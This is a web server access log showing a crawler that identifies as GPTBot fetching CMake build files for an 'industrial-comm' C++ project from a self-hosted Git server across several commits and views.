"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11183] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14917] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11732] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11730] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11301] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11185] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11182] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11185] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11183] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10203] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10020] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr 